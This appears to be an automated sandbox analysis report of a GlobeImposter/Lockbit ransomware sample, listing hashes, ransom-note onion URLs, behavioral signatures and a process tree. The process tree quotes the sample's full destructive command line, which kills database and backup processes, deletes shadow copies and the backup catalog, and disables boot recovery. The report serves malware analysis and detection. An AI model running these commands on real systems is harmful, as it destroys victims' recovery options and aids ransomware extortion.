Analysis
-
max time kernel
122s -
max time network
49s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
15-06-2022 03:56
Static task
static1
Behavioral task
behavioral1
Sample
2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe
Resource
win10v2004-20220414-en
General
-
Target
2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe
-
Size
261KB
-
MD5
860b89a4138f744adbe41cee1de0848f
-
SHA1
6367510a18f07252168ebdd7029f0e6cde919b8c
-
SHA256
2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88
-
SHA512
ed651840d87f8f5a79e2c9b57ae20f8d9e76dc14479cbbebd6f51b3f1ee95ecce70f791172f89c1d606a483c1f26bb247ade535d33e92211094931c80292ee2d
Malware Config
Extracted
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Restore-My-Files.txt
globeimposter
http://alcx6zctcmhmn3kx.onion/
http://helpinfh6vj47ift.onion/
Signatures
-
GlobeImposter
GlobeImposter is a ransomware first seen in 2017.
-
Lockbit
Ransomware family with multiple variants released since late 2019.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1184 bcdedit.exe 364 bcdedit.exe -
pid Process 1416 wbadmin.exe -
Executes dropped EXE 1 IoCs
pid Process 608 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe -
Modifies extensions of user files 7 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\StopInvoke.png => C:\Users\Admin\Pictures\StopInvoke.png.DOCX 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe File renamed C:\Users\Admin\Pictures\CompleteResolve.crw => C:\Users\Admin\Pictures\CompleteResolve.crw.DOCX 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe File renamed C:\Users\Admin\Pictures\ProtectConfirm.png => C:\Users\Admin\Pictures\ProtectConfirm.png.DOCX 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe File renamed C:\Users\Admin\Pictures\RegisterUninstall.png => C:\Users\Admin\Pictures\RegisterUninstall.png.DOCX 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe File opened for modification C:\Users\Admin\Pictures\RenameRestart.tiff 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe File renamed C:\Users\Admin\Pictures\RenameRestart.tiff => C:\Users\Admin\Pictures\RenameRestart.tiff.DOCX 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe File renamed C:\Users\Admin\Pictures\RenameStep.png => C:\Users\Admin\Pictures\RenameStep.png.DOCX 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe -
Deletes itself 1 IoCs
pid Process 1156 cmd.exe -
Loads dropped DLL 1 IoCs
pid Process 1464 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe Set value (str) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C\"" 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1464 set thread context of 608 1464 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 31 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 752 vssadmin.exe -
Kills process with taskkill 5 IoCs
pid Process 1124 taskkill.exe 1920 taskkill.exe 652 taskkill.exe 1452 taskkill.exe 1656 taskkill.exe -
NTFS ADS 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Temp\2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe:Zone.Identifier cmd.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe:Zone.Identifier cmd.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1836 PING.EXE -
Suspicious use of AdjustPrivilegeToken 52 IoCs
description pid Process Token: SeDebugPrivilege 1464 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe Token: SeDebugPrivilege 1124 taskkill.exe Token: SeDebugPrivilege 1920 taskkill.exe Token: SeDebugPrivilege 652 taskkill.exe Token: SeDebugPrivilege 1452 taskkill.exe Token: SeDebugPrivilege 1656 taskkill.exe Token: SeBackupPrivilege 472 vssvc.exe Token: SeRestorePrivilege 472 vssvc.exe Token: SeAuditPrivilege 472 vssvc.exe Token: SeIncreaseQuotaPrivilege 1308 WMIC.exe Token: SeSecurityPrivilege 1308 WMIC.exe Token: SeTakeOwnershipPrivilege 1308 WMIC.exe Token: SeLoadDriverPrivilege 1308 WMIC.exe Token: SeSystemProfilePrivilege 1308 WMIC.exe Token: SeSystemtimePrivilege 1308 WMIC.exe Token: SeProfSingleProcessPrivilege 1308 WMIC.exe Token: SeIncBasePriorityPrivilege 1308 WMIC.exe Token: SeCreatePagefilePrivilege 1308 WMIC.exe Token: SeBackupPrivilege 1308 WMIC.exe Token: SeRestorePrivilege 1308 WMIC.exe Token: SeShutdownPrivilege 1308 WMIC.exe Token: SeDebugPrivilege 1308 WMIC.exe Token: SeSystemEnvironmentPrivilege 1308 WMIC.exe Token: SeRemoteShutdownPrivilege 1308 WMIC.exe Token: SeUndockPrivilege 1308 WMIC.exe Token: SeManageVolumePrivilege 1308 WMIC.exe Token: 33 1308 WMIC.exe Token: 34 1308 WMIC.exe Token: 35 1308 WMIC.exe Token: SeIncreaseQuotaPrivilege 1308 WMIC.exe Token: SeSecurityPrivilege 1308 WMIC.exe Token: SeTakeOwnershipPrivilege 1308 WMIC.exe Token: SeLoadDriverPrivilege 1308 WMIC.exe Token: SeSystemProfilePrivilege 1308 WMIC.exe Token: SeSystemtimePrivilege 1308 WMIC.exe Token: SeProfSingleProcessPrivilege 1308 WMIC.exe Token: SeIncBasePriorityPrivilege 1308 WMIC.exe Token: SeCreatePagefilePrivilege 1308 WMIC.exe Token: SeBackupPrivilege 1308 WMIC.exe Token: SeRestorePrivilege 1308 WMIC.exe Token: SeShutdownPrivilege 1308 WMIC.exe Token: SeDebugPrivilege 1308 WMIC.exe Token: SeSystemEnvironmentPrivilege 1308 WMIC.exe Token: SeRemoteShutdownPrivilege 1308 WMIC.exe Token: SeUndockPrivilege 1308 WMIC.exe Token: SeManageVolumePrivilege 1308 WMIC.exe Token: 33 1308 WMIC.exe Token: 34 1308 WMIC.exe Token: 35 1308 WMIC.exe Token: SeBackupPrivilege 1988 wbengine.exe Token: SeRestorePrivilege 1988 wbengine.exe Token: SeSecurityPrivilege 1988 wbengine.exe -
Suspicious use of WriteProcessMemory 59 IoCs
description pid Process procid_target PID 1464 wrote to memory of 988 1464 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 27 PID 1464 wrote to memory of 988 1464 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 27 PID 1464 wrote to memory of 988 1464 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 27 PID 1464 wrote to memory of 988 1464 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 27 PID 1464 wrote to memory of 2028 1464 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 29 PID 1464 wrote to memory of 2028 1464 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 29 PID 1464 wrote to memory of 2028 1464 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 29 PID 1464 wrote to memory of 2028 1464 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 29 PID 1464 wrote to memory of 608 1464 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 31 PID 1464 wrote to memory of 608 1464 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 31 PID 1464 wrote to memory of 608 1464 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 31 PID 1464 wrote to memory of 608 1464 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 31 PID 1464 wrote to memory of 608 1464 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 31 PID 1464 wrote to memory of 608 1464 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 31 PID 1464 wrote to memory of 608 1464 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 31 PID 1464 wrote to memory of 608 1464 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 31 PID 1464 wrote to memory of 608 1464 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 31 PID 608 wrote to memory of 616 608 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 32 PID 608 wrote to memory of 616 608 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 32 PID 608 wrote to memory of 616 608 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 32 PID 608 wrote to memory of 616 608 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 32 PID 616 wrote to memory of 1124 616 cmd.exe 34 PID 616 wrote to memory of 1124 616 cmd.exe 34 PID 616 wrote to memory of 1124 616 cmd.exe 34 PID 616 wrote to memory of 1920 616 cmd.exe 36 PID 616 wrote to memory of 1920 616 cmd.exe 36 PID 616 wrote to memory of 1920 616 cmd.exe 36 PID 616 wrote to memory of 652 616 cmd.exe 37 PID 616 wrote to memory of 652 616 cmd.exe 37 PID 616 wrote to memory of 652 616 cmd.exe 37 PID 616 wrote to memory of 1452 616 cmd.exe 38 PID 616 wrote to memory of 1452 616 cmd.exe 38 PID 616 wrote to memory of 1452 616 cmd.exe 38 PID 616 wrote to memory of 1656 616 cmd.exe 39 PID 616 wrote to memory of 1656 616 cmd.exe 39 PID 616 wrote to memory of 1656 616 cmd.exe 39 PID 616 wrote to memory of 752 616 cmd.exe 40 PID 616 wrote to memory of 752 616 cmd.exe 40 PID 616 wrote to memory of 752 616 cmd.exe 40 PID 616 wrote to memory of 1308 616 cmd.exe 43 PID 616 wrote to memory of 1308 616 cmd.exe 43 PID 616 wrote to memory of 1308 616 cmd.exe 43 PID 616 wrote to memory of 1184 616 cmd.exe 44 PID 616 wrote to memory of 1184 616 cmd.exe 44 PID 616 wrote to memory of 1184 616 cmd.exe 44 PID 616 wrote to memory of 364 616 cmd.exe 45 PID 616 wrote to memory of 364 616 cmd.exe 45 PID 616 wrote to memory of 364 616 cmd.exe 45 PID 616 wrote to memory of 1416 616 cmd.exe 46 PID 616 wrote to memory of 1416 616 cmd.exe 46 PID 616 wrote to memory of 1416 616 cmd.exe 46 PID 608 wrote to memory of 1156 608 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 52 PID 608 wrote to memory of 1156 608 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 52 PID 608 wrote to memory of 1156 608 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 52 PID 608 wrote to memory of 1156 608 2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe 52 PID 1156 wrote to memory of 1836 1156 cmd.exe 54 PID 1156 wrote to memory of 1836 1156 cmd.exe 54 PID 1156 wrote to memory of 1836 1156 cmd.exe 54 PID 1156 wrote to memory of 1836 1156 cmd.exe 54
Processes
-
C:\Users\Admin\AppData\Local\Temp\2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe"C:\Users\Admin\AppData\Local\Temp\2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C type nul > "C:\Users\Admin\AppData\Local\Temp\2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe:Zone.Identifier"2⤵
- NTFS ADS
PID:988
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C type nul > "C:\Users\Admin\AppData\Local\Temp\2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe:Zone.Identifier"2⤵
- NTFS ADS
PID:2028
-
-
C:\Users\Admin\AppData\Local\Temp\2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe"C:\Users\Admin\AppData\Local\Temp\2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe"2⤵
- Executes dropped EXE
- Modifies extensions of user files
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:608 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im sql* & taskkill /f /im backup* & taskkill /f /im MSExchange* & taskkill /f /im Microsoft.Exchange.* & taskkill /f /im mysql* & vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet3⤵
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Windows\system32\taskkill.exetaskkill /f /im sql*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1124
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im backup*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1920
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im MSExchange*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:652
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im Microsoft.Exchange.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1452
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im mysql*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:752
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1308
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
PID:1184
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no4⤵
- Modifies boot configuration data using bcdedit
PID:364
-
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet4⤵
- Deletes backup catalog
PID:1416
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 2 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe"3⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 24⤵
- Runs ping.exe
PID:1836
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:472
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1760
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1996
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe
Filesize261KB
MD5860b89a4138f744adbe41cee1de0848f
SHA16367510a18f07252168ebdd7029f0e6cde919b8c
SHA2562aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88
SHA512ed651840d87f8f5a79e2c9b57ae20f8d9e76dc14479cbbebd6f51b3f1ee95ecce70f791172f89c1d606a483c1f26bb247ade535d33e92211094931c80292ee2d
-
\Users\Admin\AppData\Local\Temp\2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe
Filesize261KB
MD5860b89a4138f744adbe41cee1de0848f
SHA16367510a18f07252168ebdd7029f0e6cde919b8c
SHA2562aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88
SHA512ed651840d87f8f5a79e2c9b57ae20f8d9e76dc14479cbbebd6f51b3f1ee95ecce70f791172f89c1d606a483c1f26bb247ade535d33e92211094931c80292ee2d